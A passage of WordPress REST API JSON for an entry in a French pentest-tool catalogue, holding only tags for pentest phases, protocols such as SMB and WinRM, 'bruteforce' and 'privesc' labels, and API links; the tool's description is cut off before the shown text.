lat\u00e9ral en environnement Active Directory<\/p>\n","protected":false},"template":"","meta":{"footnotes":""},"phase_pentest":[25,26,27],"categorie_fonctionnelle":[],"port_numero":[61,60,62,34,64,63],"protocole":[28,59,57,30,58,56],"tag_outil":[65,66],"class_list":["post-292","pandack_outil","type-pandack_outil","status-publish","hentry","phase_pentest-enumeration","phase_pentest-exploitation","phase_pentest-post-exploitation","port_numero-61","port_numero-60","port_numero-62","port_numero-34","port_numero-64","port_numero-63","protocole-ldap","protocole-mssql","protocole-rdp","protocole-smb","protocole-ssh","protocole-winrm","tag_outil-bruteforce","tag_outil-privesc"],"_links":{"self":[{"href":"https:\/\/pandack.fr\/index.php?rest_route=\/wp\/v2\/pandack_outil\/292","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/pandack.fr\/index.php?rest_route=\/wp\/v2\/pandack_outil"}],"about":[{"href":"https:\/\/pandack.fr\/index.php?rest_route=\/wp\/v2\/types\/pandack_outil"}],"version-history":[{"count":1,"href":"https:\/\/pandack.fr\/index.php?rest_route=\/wp\/v2\/pandack_outil\/292\/revisions"}],"predecessor-version":[{"id":303,"href":"https:\/\/pandack.fr\/index.php?rest_route=\/wp\/v2\/pandack_outil\/292\/revisions\/303"}],"wp:attachment":[{"href":"https:\/\/pandack.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=292"}],"wp:term":[{"taxonomy":"phase_pentest","embeddable":true,"href":"https:\/\/pandack.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fphase_pentest&post=292"},{"taxonomy":"categorie_fonctionnelle","embeddable":true,"href":"https:\/\/pandack.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategorie_fonctionnelle&post=292"},{"taxonomy":"port_numero","embeddable":true,"href":"https:\/\/pandack.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fport_numero&post=292"},{"taxonomy":"protocole","embeddable":true,"href":"https:\/\/pandack.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fprotocole&post=292"},{"taxonomy":"tag_outil","embeddable":true,"href":"https:\/\/pandack.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftag_outil&post=292"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}